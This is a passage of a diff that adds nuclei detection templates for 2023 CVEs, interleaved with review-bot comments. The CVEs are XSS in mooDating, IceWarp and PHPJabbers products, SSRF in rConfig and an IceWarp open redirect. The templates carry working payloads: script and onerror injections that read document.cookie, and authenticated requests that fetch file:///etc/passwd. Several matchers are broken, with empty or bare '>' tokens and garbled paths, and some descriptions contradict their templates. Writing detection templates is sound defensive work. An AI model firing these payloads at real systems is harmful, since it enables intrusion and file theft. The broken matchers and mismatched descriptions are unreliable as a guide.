@@ -0,0 +1,32 @@ +id: CVE-2023-3848 + +info: + name: MooDating 1.2 - Cross-site scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3848 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3848 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,moodating + +http: + - method: GET + path: + - '{{BaseURL}}/users/viewi1omd">l43yn/108?tab=activity' + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "", "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml new file mode 100644 index 0000000000..0bfef4bbd4 --- /dev/null +++ b/http/cves/2023/CVE-2023-3849.yaml 
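Review bot: The request path is the same as the one in CVE-2023-3847 (`/users/viewi1omd…l43yn/108?tab=activity`, same reflected token `l43yn`), so the two templates send one request twice and can only yield duplicate findings; this CVE is filed against `/users/view`, so the path and token should be distinct from the `/users` template. The path here is written with raw `"` and `>` characters where every sibling percent-encodes them, and as far as I know nuclei sends the path as given; keep one form, preferably the encoded one, and the same applies to CVE-2023-3849. The `contains_all(body, "", "mooDating")` clause carries an empty string as printed, which matches every page.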
@@ -0,0 +1,31 @@ +id: CVE-2023-3849 +info: + name: mooDating 1.2 - Cross-site scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3849 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3849 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,unauth,moodating + +http: + - method: GET + path: + - '{{BaseURL}}/find-a-matchpksyk">s9a64?' + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains(body, ">s9a64") && contains(body, "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 150442d8b0..8a58df2fdd 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml 
@@ -1,53 +1,35 @@ id: CVE-2023-38501 info: - name: Copyparty v1.8.6 - Cross-Site Scripting - author: ctflearner + name: CopyParty v1.8.6 - Cross Site Scripting + author: ctflearner,r3Y3r53 severity: medium description: | - Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. The vulnerability in the application's web interface could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link. - remediation: Upgrade to the latest version to mitigate this vulnerability. + Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link. + remediation: Fixed in v1.8.6 reference: - https://www.exploit-db.com/exploits/51635 - - https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38 - - https://github.com/9001/copyparty/security/advisories/GHSA-f54q-j679-p9hh + - https://github.com/9001/copyparty/releases/tag/v1.8.6 - https://nvd.nist.gov/vuln/detail/CVE-2023-38501 - - http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 - cve-id: CVE-2023-38501 cwe-id: CWE-79 - epss-score: 0.00282 - epss-percentile: 0.64883 - cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - vendor: copyparty_project - product: copyparty shodan-query: title:"copyparty" - tags: packetstorm,copyparty,cve,cve2023,xss + tags: cve,cve2023,copyparty,xss,oss http: - method: GET path: - "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E" - matchers-condition: and matchers: - - type: word - part: body - words: - - '' - - 'go to /' + 
- type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "","\">go to")' condition: and - - - type: word - part: header - words: - - 'text/html' - - - type: status - status: - - 200 diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml new file mode 100644 index 0000000000..6e1b328c71 --- /dev/null +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -0,0 +1,58 @@ +id: CVE-2023-39108 + +info: + name: rConfig 3.9.4 - Server-Side Request Forgery + author: theamanrawat + severity: high + description: | + rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_b.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-39108 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-39108 + cwe-id: CWE-918 + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"rConfig" + tags: cve,cve2023,rconfig,authenticated,ssrf,lfr + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "rConfig" + + - type: regex + part: body_3 + regex: + - "root:.*:0:0:" + + - type: status + part: header_3 + status: + - 200 
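Review bot: The classification rewrite removes `cve-id: CVE-2023-38501`, the field that ties the template to its CVE for anything that indexes by it; `cwe-id` stays, so the removal looks accidental and the line should be restored. The reference list also loses the upstream fix commit and the GHSA advisory in favour of the release tag; the advisory is the more useful link because it names the affected code. The new description has a missing space in "Attack.Vulnerability", and `epss-score`, `epss-percentile`, `cpe`, `vendor` and `product` are generated enrichment fields that the next enrichment run will re-add, so dropping them only churns the file.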
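Review bot: The status matcher carries `part: header_3`, but a status matcher selects on the response status code and, as far as I know, does not take a part; if the intent is to pin the third response, a DSL clause `status_code_3 == 200` does that explicitly (CVE-2023-39110 has the same construct, CVE-2023-39109 has no part at all). `max-request: 1` undercounts the three raw requests. The probe requests `file:///etc/passwd`, i.e. a local file read through the URL handler, which the `lfr` tag reflects, but CVE-2023-39109 tags the identical behaviour `lfi`; settle on one tag across the three rConfig templates.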
diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml new file mode 100644 index 0000000000..8c72518b8e --- /dev/null +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -0,0 +1,57 @@ +id: CVE-2023-39109 + +info: + name: rConfig 3.9.4 - Server-Side Request Forgery + author: theamanrawat + severity: high + description: | + rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_a.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-39109 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-39109 + cwe-id: CWE-918 + metadata: + verified: true + shodan-query: http.title:"rConfig" + max-request: 1 + tags: cve,cve2023,rconfig,authenticated,ssrf,lfi + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "rConfig" + + - type: regex + part: body_3 + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml new file mode 100644 index 0000000000..8cc04670ed --- /dev/null +++ b/http/cves/2023/CVE-2023-39110.yaml 
@@ -0,0 +1,57 @@ +id: CVE-2023-39110 + +info: + name: rConfig 3.9.4 - Server-Side Request Forgery + author: theamanrawat + severity: high + description: | + rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_%20ajaxGetFileByPath.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-39110 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-39110 + cwe-id: CWE-918 + metadata: + verified: true + shodan-query: http.title:"rConfig" + tags: cve,cve2023,rconfig,authenticated,ssrf,lfr + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers-condition: and + matchers: + - type: regex + part: body_3 + regex: + - "root:.*:0:0:" + + - type: word + part: body_1 + words: + - 'rConfig' + + - type: status + part: header_3 + status: + - 200 diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml new file mode 100644 index 0000000000..d1f2cc061c --- /dev/null +++ b/http/cves/2023/CVE-2023-39700.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2023-39700 + +info: + name: IceWarp Mail Server v10.4.5 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-39700 + - https://cwe.mitre.org/data/definitions/79.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-39700 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + shodan-query: http.title:"IceWarp Server Administration" + tags: cve,cve2023,icewarp,xss,unauth + +http: + - raw: + - | + GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains(body, ">") && contains(body, "IceWarp")' + condition: and diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml new file mode 100644 index 0000000000..f62455ae8b --- /dev/null +++ b/http/cves/2023/CVE-2023-40208.yaml 
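Review bot: The reflection check `contains(body, ">") && contains(body, "IceWarp")` is satisfied by any HTML page the product serves, so as rendered here the template fires on every reachable IceWarp webmail regardless of whether the `color` parameter is reflected; the assertion should name the unescaped injected attribute, e.g. `contains(body, "onerror=confirm(document.cookie)")`, so an HTML-encoded echo does not count as a hit. The same trivially-true token (`">"`, or the empty string `""`) is the only reflection evidence in CVE-2023-4110, CVE-2023-4111, CVE-2023-4112, CVE-2023-4113, CVE-2023-4114, CVE-2023-4115, CVE-2023-4116, CVE-2023-4148 (`contains(body_2, "")`), CVE-2023-41538 and CVE-2023-4547 (`- ''`). If the original markup tokens were lost when this diff was rendered, the files themselves still deserve a look, because a word or DSL match on a bare `>` cannot distinguish injection from normal page content.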
@@ -0,0 +1,49 @@ +id: CVE-2023-40208 + +info: + name: Stock Ticker <= 3.23.2 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + remediation: Fixed in version 3.23.3 + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3233-reflected-cross-site-scripting + - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-3-unauth-reflected-cross-site-scripting-xss-vulnerability + - https://wordpress.org/plugins/stock-ticker/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-40208 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-40208 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+ + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "stock_ticker" + - "onmousemove=alert(document.domain)" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml new file mode 100644 index 0000000000..a4bcb1238e --- /dev/null +++ b/http/cves/2023/CVE-2023-40779.yaml 
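Review bot: The affected-version statements in `info` contradict each other: `name: Stock Ticker <= 3.23.2` and `remediation: Fixed in version 3.23.3` say 3.23.3 is safe, while the description says "versions up to, and including, 3.23.3". Both cannot be true; the description should read `up to, and including, 3.23.2` (or the name and remediation must move), and the cited advisory decides which. The word matcher itself is a good model for the rest of this change, since it looks for the unescaped `onmousemove=alert(document.domain)` rather than a generic HTML token.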
@@ -0,0 +1,38 @@ +id: CVE-2023-40779 + +info: + name: IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect + author: r3Y3r53 + severity: medium + description: | + An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL. + reference: + - https://medium.com/@muthumohanprasath.r/open-redirection-vulnerability-on-icewarp-webclient-product-cve-2023-40779-61176503710 + - https://nvd.nist.gov/vuln/detail/CVE-2023-40779 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-40779 + cwe-id: CWE-601 + cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: title:"IceWarp" + tags: cve,cve2023,icewarp,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/%5coast.pro/%2f%2e%2e" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' + + - type: status + status: + - 302 diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml new file mode 100644 index 0000000000..3cde00999e --- /dev/null +++ b/http/cves/2023/CVE-2023-4110.yaml 
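Review bot: The description does not describe the finding: it says the issue "allows a remote attacker to execute arbitrary code", while the `name`, `cwe-id: CWE-601`, the 6.1 score and the `Location` regex all describe an open redirect. Replace it with wording that matches the detection, e.g. `An open redirect in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to send users to an arbitrary external host via a crafted URL path.` The matcher is appropriately strict — it needs a 302 and a `Location` naming `oast.pro` — so a same-host redirect will not match.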
@@ -0,0 +1,35 @@ +id: CVE-2023-4110 + +info: + name: PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely. + reference: + - http://packetstormsecurity.com/files/173926/PHPJabbers-Availability-Booking-Calendar-5.0-Cross-Site-Scripting.html + - https://vuldb.com/?id.235957 + - https://nvd.nist.gov/vuln/detail/CVE-2023-4110 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4110 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,phpjabber,jabber + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "Booking", "Arrival", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml new file mode 100644 index 0000000000..8cd543b774 --- /dev/null +++ b/http/cves/2023/CVE-2023-4111.yaml 
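Review bot: The vendor tag is spelled three different ways across the PHPJabbers templates in this change: `phpjabber,jabber` here and in CVE-2023-4111, CVE-2023-4115 and CVE-2023-41538, `phpjabbers` in CVE-2023-4112 and CVE-2023-4116, and `php,jabbers` in CVE-2023-4113 and CVE-2023-4114. `jabber` names an unrelated messaging protocol and `php` is too generic to filter on, so all eight should carry the same single vendor tag matching the `cpe` vendor field, e.g. `tags: cve,cve2023,xss,phpjabbers`. The `name` field drifts the same way (`PHPJabbers` versus `PHP Jabbers` in CVE-2023-4114).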
@@ -0,0 +1,35 @@ +id: CVE-2023-4111 + +info: + name: PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely. + reference: + - https://vuldb.com/?id.235958 + - https://packetstormsecurity.com/files/173927/PHPJabbers-Bus-Reservation-System-1.1-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4111 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4111 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,phpjabber,jabber + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id=" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "You have an error in your SQL syntax", ">")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml new file mode 100644 index 0000000000..25a6aeab16 --- /dev/null +++ b/http/cves/2023/CVE-2023-4112.yaml 
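Review bot: The DSL matcher for this cross-site scripting template keys on `"You have an error in your SQL syntax"`, so a hit means a database error was echoed, not that the `pickup_id` payload was reflected; it will also match any deployment that leaks SQL errors and miss one that reflects the payload without erroring. Assert the reflected value in the response instead, and if the error string is genuinely how the affected version responds to this request, state that in the description so the next maintainer does not "fix" it. The URL also passes `index` and `locale` twice (`index=4005` … `index=0`, `locale=1` … `locale=`); PHP keeps the last occurrence, so the earlier values are dead and dropping them makes the request unambiguous.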
@@ -0,0 +1,37 @@ +id: CVE-2023-4112 + +info: + name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://www.exploitalert.com/view-details.html?id=39750 + - https://cxsecurity.com/ascii/WLB-2023080012 + - http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4112 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4112 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: html:"PHP Jabbers.com" + tags: cve,cve2023,xss,unauth,phpjabbers + +http: + - method: GET + path: + - "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1" + + matchers: + - type: dsl + dsl: + - 'contains(body, "PHPJabbers") && contains(body, ">")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml new file mode 100644 index 0000000000..f63f762be8 --- /dev/null +++ b/http/cves/2023/CVE-2023-4113.yaml 
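Review bot: The description is generic boilerplate ("The attacker can send to victim a link containing a malicious URL …") that names neither the product nor where input is reflected, and CVE-2023-4115 carries the identical sentence. Based on the request, something like `PHPJabbers Shuttle Booking Software 1.0 reflects the request path of /index.php (controller=pjAdmin&action=pjActionLogin) into the response without encoding, allowing reflected cross-site scripting.` would tell a reader what is being tested. The existing sentence is also ungrammatical ("can send to victim a link … can perform").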
@@ -0,0 +1,34 @@ +id: CVE-2023-4113 + +info: + name: PHPJabbers Service Booking Script 1.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely. + reference: + - http://packetstormsecurity.com/files/173931/PHPJabbers-Service-Booking-Script-1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4113 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4113 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,php,jabbers + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "Select Service(s)", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml new file mode 100644 index 0000000000..6abdc7f5de --- /dev/null +++ b/http/cves/2023/CVE-2023-4114.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2023-4114 + +info: + name: PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. + reference: + - https://www.exploitalert.com/view-details.html?id=39749 + - http://packetstormsecurity.com/files/173932/PHPJabbers-Night-Club-Booking-1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4114 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4114 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,php,jabbers + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date=" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "Drinks & Extras", "Checkout", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml new file mode 100644 index 0000000000..8565d09920 --- /dev/null +++ b/http/cves/2023/CVE-2023-4115.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2023-4115 + +info: + name: PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://www.exploitalert.com/view-details.html?id=39747 + - https://cxsecurity.com/ascii/WLB-2023080015 + - https://nvd.nist.gov/vuln/detail/CVE-2023-4115 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4115 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,phpjabber,jabber + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "Enquiry summary", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml new file mode 100644 index 0000000000..cca1514cb3 --- /dev/null +++ b/http/cves/2023/CVE-2023-4116.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2023-4116 + +info: + name: PHPJabbers Taxi Booking 2.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely. + reference: + - https://www.exploitalert.com/view-details.html?id=39746 + - https://cxsecurity.com/ascii/WLB-2023080016 + - http://packetstormsecurity.com/files/173937/PHPJabbers-Taxi-Booking-2.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4116 + - https://vuldb.com/?ctiid.235963 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4116 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: html:"PHP Jabbers.com" + tags: cve,cve2023,xss,phpjabbers + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "Passengers", "Drop-off address", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml new file mode 100644 index 0000000000..2ce7ee44ba --- /dev/null +++ b/http/cves/2023/CVE-2023-4148.yaml 
